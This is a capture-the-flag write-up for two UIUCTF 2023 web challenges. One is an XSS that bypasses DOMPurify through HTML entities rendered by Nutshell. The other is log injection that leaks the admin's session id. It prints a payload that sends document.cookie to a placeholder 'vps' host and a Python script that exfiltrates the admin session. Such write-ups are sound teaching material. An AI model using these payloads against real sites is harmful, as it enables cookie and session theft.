UIUCTF2023 WEB WP

peanut-xss

An interesting XSS problem.

Analyzing the website’s code, we can find our input html code has been checked by the DOMPurify, and then, it will be rendered by nutshell

So let’s check the source code of Nutshell

In the line 615 & 622, we can notice a vulnerability.

We can notice that if we input a HTML entity(e.g. &lt), it will be rendered as < in ex.InnerText.

After then, the symbol < will be directly passed to the linkText, which will be appended into the ex later

So, there exists a XSS, and then we can get the cookie.

1
<a>:&ltimg src=x onerror=fetch("https://vps/"+document.cookie)&gt</a>

adminplz

What a nice problem.

Check the source code, we can notice that there exists a log file.

Besides, we can inject out username and sessionid into the log.

So, there is a basic idea that we can concat two malicious username(e.g. <meta http-equiv="refresh" content="0; URL='VPS/?leak= and '">) as a malicious script to get admin’s sessionid

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import time
import requests

baseurl = "https://inst-83397f672f438108.adminplz.chal.uiuc.tf/"

res = requests.post(baseurl + "login", data={"username": "<meta http-equiv=\"refresh\" content=\"0; URL='https://vps/?leak=", "password": "1"})

print(res.text)

res = requests.get(baseurl + "admin?view=flag", cookies=res.cookies)

print(res.text)

res = requests.post(baseurl + "report", data={"url": "http://127.0.0.1:8080/admin?view=file:///flag.html"}, cookies=res.cookies)

print(res.text)

print("Coffee Break!")

for i in range(305):
    time.sleep(1)

res = requests.post(baseurl + "login", data={"username": "'\">", "password": "1"})

print(res.text)

res = requests.get(baseurl + "admin?view=flag", cookies=res.cookies)

print(res.text)

res = requests.post(baseurl + "report", data={"url": "http://127.0.0.1:8080/admin?view=file:///var/log/adminplz/latest.log"}, cookies=res.cookies)

print(res.text)


# res = requests.get(baseurl + "admin?view=file:///flag.html", cookies={"JSESSIONID": "CBB67381DD7D3DD626E64DC0200BB3E1"})
#
# print(res.text)

However, I’m still not clearly understand why the <meta> tag can be parsed in a .log file.